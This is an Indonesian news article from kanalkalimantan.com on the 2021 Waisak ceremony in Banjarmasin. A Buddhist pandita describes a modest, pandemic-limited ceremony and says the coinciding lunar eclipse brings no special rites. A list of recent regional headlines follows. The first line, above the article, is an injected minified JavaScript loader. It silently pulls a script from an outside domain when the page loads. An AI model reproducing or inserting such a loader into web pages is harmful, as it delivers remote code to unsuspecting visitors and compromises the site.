(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Momen Gerhana Bulan, Puncak Peringatan Waisak Umat Budha di Banjarmasin


KANALKALIMANTAN.COM, BANJARMASIN – Memperingati Hari Raya Waisak yang jatuh pada Rabu (26/5/2021), umat agama Budha di Banjarmasin melakukan pembacaan ayat sebelum memasuk upacara puncak malam ini.

Upacara Waisak merupakan moment dimana umat agama Budha untuk merenung tentang kehidupan yang telah dilaluinya.

Sarwa Dharma, Pandita umat agama Budha Banjarmasin mengatakan, sama seperti tahun yang sebelum, pelaksanakan upacara peringatan Hari Raya Waisak dengan sederhana, karena kondisi masih dilanda pandemi.

“Yang penting inti dari peringatan Waisak itu sendiri tersampaikan. Karena pada dasarnya Hari Raya Waisak itu sendiri bukan lah pesta ataupun keramaian, melainkan renungan,” ujarnya.

Baca juga: Aksi Solidaritas Peduli Palestina, Relawan HSU Salurkan Donasi Rp 547Juta

Ia juga mengatakan, saat peringatan Hari Raya Waisak ini, umat agama Budha akan melakukan Puja Bakti Waisak.

“Yang dalam hal tersebut, kita umat agama Budha akan melakukan meditasi,” katanya.
Puja Bakti Waisak akan dilakukan pada sore hari hingga menjelang detik Waisak nanti.

“Jadi sebelum itu, dari pagi kita sudah melakukan pembacaan ayat dan juga melakukan penghormatan dengan cara mengelilingi patung Budha sebanyak 3 kali, dengan membawa dupa, bunga dan lilin,” ucapnya.

Mengingat masih dalam masa pandemi, peringatan Hari Raya Waisak hanya dilakukan secara sederhana dan juga pembatasan untuk umat yang hadir dalam peringatan tahun ini.

“Sama seperti tahun kemarin, kita juga membatasi umat yang datang, agar tidak terjadi penyebaran virus Covid-19, dan tentunya umat yang hadir juga wajib sesuai dengan prokes yang sudah dianjurkan,” tutur.

Disamping itu, Pandita juga mengungkapkan, kalau Waisak tahun ini juga sama seperti sebelumnya, walaupun bersamaan dengan momen gerhana bulan.

“Sebenarnya bagi kami umat Budha itu merupakan hal yang biasa, karena sudah sering terjadi hal seperti ini sebelumnya. Karena kejadian ini merupakan bagian dari hukum Dharma,” beber Pandita.

“Selain itu juga, untuk upacara pun tidak ada hal-hal yang khusus atau berbeda yang berkaitan dengan moment gerhana bulan ini,” tambah Pandita.

Baca juga: Ini Kata Sekda Banjarmasin Soal Refocusing Anggaran Covid-19

Pandita juga mengimbau kepada seluruh umat agama Budha yang sedang merayakan Hari Raya Waisak, baik yang ikut upacara di wihara ataupun tidak, agar tetap menjaga kesehatannya dan juga tetap menerapkan prokes yang berlaku.

“Walaupun kita merayakan hari raya Waisak, tapi kita juga tetap harus menjaga diri kita dan juga orang lain. Dan yang poastinya agar tidak terjadi klaster yang baru lagi,” pungkas Pandita.
(kanalkalimantan.com/tius)

Reporter: tius
Editor : kk


Al Ghifari

Recent Posts

Dua APILL Disiapkan, Atasi Kemacetan di Panglima Batur Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru menggelar ekspose pembangunan Area Traffic Control System (ATCS)… Read More

56 menit ago

Dua Bapaslon Jalur Non Partai Serahkan Syarat Dukungan ke KPU Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN – Detik-detik terakhir penutupan penyerahan syarat dukungan bakal pasangan calon (Bapaslon) Wali Kota… Read More

1 jam ago

Bupati Lepas TP PKK Banjar Wakil Kalsel ke Parade Budaya Nusantara

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur melepas peserta lomba Parade Budaya Nusantara, di… Read More

3 jam ago

Tak Ada Peminat Jalur Perseorangan di Pilwali Banjarbaru 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemilihan Wali Kota dan Wakil Wali Kota dalam kontestasi Pilkada 2024 di… Read More

3 jam ago

Kebakaran Dini Hari di Palangkaraya, Dana Hanya Bisa Selamatkan Anak Istri

KANALKALIMANTAN.COM, PALANGKARAYA - Puluhan rumah di permukiman padat penduduk Jalan Mendawai Induk, Kota Palangkaraya, Kalimantan… Read More

6 jam ago

Amuntai Expo dan Bazar UMKM 2024 Berakhir

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) melalui Asisten Perekonomian dan Pembangunan… Read More

6 jam ago

This website uses cookies.